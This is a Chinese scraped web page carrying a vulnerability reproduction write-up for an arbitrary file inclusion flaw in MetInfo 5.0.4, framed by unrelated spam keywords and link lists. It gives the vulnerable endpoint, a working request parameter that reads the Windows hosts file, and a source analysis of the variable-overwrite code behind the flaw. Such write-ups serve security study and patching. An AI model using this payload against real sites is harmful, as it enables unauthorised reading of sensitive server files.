当前位置: 首页 > news >正文

山河建设有限公司网站网站系统平台的安全策略是什么

山河建设有限公司网站,网站系统平台的安全策略是什么,天梯网站建设,嘉兴注册公司1.1漏洞描述 漏洞编号————漏洞类型文件包含漏洞等级⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐漏洞环境windows攻击方式 MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 5.0.4 版本中的 /metinfo_5.0.4/about/index.php?fmodule文件存在任意文件包含漏洞。攻击者可利用漏洞读取网…

1.1漏洞描述

漏洞编号————
漏洞类型文件包含
漏洞等级⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐
漏洞环境windows
攻击方式

MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 5.0.4 版本中的 /metinfo_5.0.4/about/index.php?fmodule文件存在任意文件包含漏洞。攻击者可利用漏洞读取网站上的敏感文件。 

1.2漏洞等级

高危

1.3影响版本

metinfo 5.0.4 

1.4漏洞复现

1.4.1.基础环境

组件版本
OSMicrosoft Windows Server 2016 Standard
Web ServerphpStudy 2016
MetInfo5.0.4

开启: metinfo 5.0.4 

1.4.2.漏洞点

/metinfo_5.0.4/about/index.php?fmodule=7

1.4.3.测试

&module=c:/windows/system32/drivers/etc/hosts

 成功获取hosts信息,证明漏洞存在

1.4.4 源码分析

        根据index.php我们可以看到文件包含,主要包含$module.(变量,动态包含,存在漏洞)

<?php
# MetInfo Enterprise Content Management System 
# Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved. 
$filpy = basename(dirname(__FILE__));
$fmodule=1;
require_once '../include/module.php';
//echo $fmodule;
//echo "<hr >";
//echo $module;
require_once $module;
# This program is an open source system, commercial use, please consciously to purchase commercial license.
# Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved.
?>

        module.php代码关键部分, 这里只判断了$fmodule!=7进入if分支,没有判断$fmodule=7,而且带码还包含了common.inc.(这里的代码不完全,建议下载metinfo 5.0.4)

if($fmodule!=7){if($mdle==100)$mdle=3;if($mdle==101)$mdle=5;$module = $modulefname[$mdle][$mdtp];if($module==NULL){okinfo('../404.html');exit();}if($mdle==2||$mdle==3||$mdle==4||$mdle==5||$mdle==6){if($fmodule==$mdle){$module = $modulefname[$mdle][$mdtp];}else{okinfo('../404.html');exit();}}else{if($list){okinfo('../404.html');exit();}else{$module = $modulefname[$mdle][$mdtp];}}if($mdle==8){if(!$id)$id=$class1;$module = '../feedback/index.php';}
}
?>

         common.inc下面这几行代码会将GPC参数传递过来的变量全部存储成变量,进行执行。

过程:
&module=c:/windows/system32/drivers/etc/hosts

       |                                |

$module =                  $module值

foreach(array('_COOKIE', '_POST', '_GET') as $_request) {foreach($$_request as $_key => $_value) {$_key{0} != '_' && $$_key = daddslashes($_value);}
}

        所以我们传入&module=c:/windows/system32/drivers/etc/hosts则会执行,查看到hosts信息

1.5深度利用

1.5.1

暂无

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

  • 升级

  • 打补丁

  • 上设备

http://www.yayakq.cn/news/460124/

相关文章:

  • 青岛建网站哪个好门户资源分享网站模板
  • 无锡做网站专业的公司中国网站虚拟主机 排名
  • 专业做医药招聘的网站国外设计网站pinterest设计网址
  • 公司网站建设上海找谁扬州百度seo公司
  • 成都电子商城网站开发如何注册域名及网站
  • 公司网站百度推广做网站的能赚多少钱
  • 广州手机网站定制信息做微信用什么网站
  • 自己随便玩玩的网站怎么建设网站导航结构的优化
  • 做汽车团购的网站西安大雁塔在哪个区
  • 营销型网站建设的指导原则不包括做网站多少宽带够
  • 旅行社网站建设规划郑州网站建设代理
  • 在网站上做的图表怎么放到PPT里面网站建设国外
  • 招聘类网站该怎么做seo搜索引擎优化就业指导
  • 网站加网页专门查企业的网站
  • 网站开发 接个支付支付难吗wordpress4.0+中文
  • 服装箱包网站建设秦皇岛海港区
  • 成都网站建设搭建郑州建设网站定制
  • 用外链技术做视频网站网站建设营销型网站概念
  • Dedecms 手机网站示例深圳做网站哪个公司好
  • 体贴的聊城网站建设唐山哪里建设的好
  • 怎样创建购物网站上海建站
  • 新网登录网站后台网页模板库
  • 网站全栰培训电商网站开发的主流技术
  • 如何在公司网站上添加内容分级会员管理系统网站开发
  • 制作博客网站如何选择武进网站建设
  • 怎么改网站域名软件开发工具框图
  • 个人网站要怎么做郓城县住房和建设局网站
  • 一站式做网站公司wordpress邮箱非必填
  • 只做绿色食品的网站网站制作公司信科网络
  • 微信微网站是什么格式长沙传媒公司招聘信息